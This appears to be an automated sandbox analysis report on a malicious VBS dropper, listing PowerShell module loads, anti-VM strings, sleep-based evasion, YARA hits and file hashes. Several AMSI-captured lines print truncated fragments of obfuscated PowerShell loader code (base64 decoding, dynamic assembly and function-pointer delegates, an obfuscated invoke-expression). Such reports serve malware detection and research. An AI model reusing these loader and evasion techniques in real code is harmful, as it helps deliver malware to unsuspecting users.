Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Dispatch)$global:Tonical = [System.Text.Encoding]::ASCII.GetString($Palaetiological)$global:Kandidtwr=$Tonical.substring($Tedeummers,$Formningernes)<#Rhizoma Slake Studenterforeninge
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sammenkdningernes $stemplings $anarkisternes), (Svinglerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aerotaxis = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forbifartens120)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Righters, $false).DefineType($Croconic, $
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Dispatch)$global:Tonical = [System.Text.Encoding]::ASCII.GetString($Palaetiological)$global:Kandidtwr=$Tonical.substring($Tedeummers,$Formningernes)<#Rhizoma Slake Studenterforeninge

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B870952 push E95B67D0h; ret	1_2_00007FFD9B8709C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B945479 push ebp; iretd	1_2_00007FFD9B945538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0487EC78 pushfd ; retf	4_2_0487EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04870EC9 push ebx; iretd	4_2_04870ECA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_076D1FB2 push eax; mov dword ptr [esp], ecx	4_2_076D21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_076D34A8 push eax; ret	4_2_076D34C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_083736D9 push ebx; iretd	4_2_083736DA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4542	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5341	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5474	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4285	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 7364	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep count: 5474 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep count: 4285 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: wscript.exe, 00000000.00000002.1717425370.00000190BA1B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicshutdown
Source: wscript.exe, 00000000.00000003.1715143254.00000190BA1B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.1717425370.00000190BA1B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: wscript.exe, 00000000.00000003.1698591176.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1717268310.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703727134.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1714186520.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715740470.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702645545.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: wscript.exe, 00000000.00000003.1703648920.00000190B81F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1717060927.00000190B8213000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698591176.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713686437.00000190B8213000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702723316.00000190B81CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1717268310.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703727134.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1714186520.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715740470.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702645545.00000190BA0DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.3056433769.0000021EF2781000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Su

Source: Yara match	File source: amsi64_7456.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

ID:	1466652
Product:	CloudBasic
Start time:	08:44:34
Start date:	03.07.2024
Sample:	Urgent_File_Confirmation_00000000000000000000.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	182b6f3f627a31ed7ca07dac5301a313
SHA1:	10344a8ea462146b923a66accacb6882d5788322
SHA256:	a268983f063d0e933961c93cd3d813a7b8ba94d81789eced7da6a2e3bef32836
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	BC2C74B36B11021AAEEFC0AB0D589AF6	14B6F6FC16C8F9D9B4D3CDBB36D7D23A3EE21B25	CF8CB296C03329743F220D61E00BBB8E29E22A00F143724E4A39B5A009B6D4D0
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25dnuflu.ci0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lykckzwr.vzf.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzvscs4r.jtf.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z531fgvl.vw2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Paraphysiferous.Mak	ASCII text, with very long lines (65536), with no line terminators	53E3335A514DEE2DD07BC369AED7847C	B45830532DC1463C78E6A877051B214642995DFC	BA2D10B398D13B8EB8098BD430E128E318E2653A333E5E292B9780FFFC3AEBF0

Windows Analysis Report Urgent_File_Confirmation_00000000000000000000.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
Urgent_File_Confirmation_00000000000000000000.vbs

Malware Threat Intel
Provided by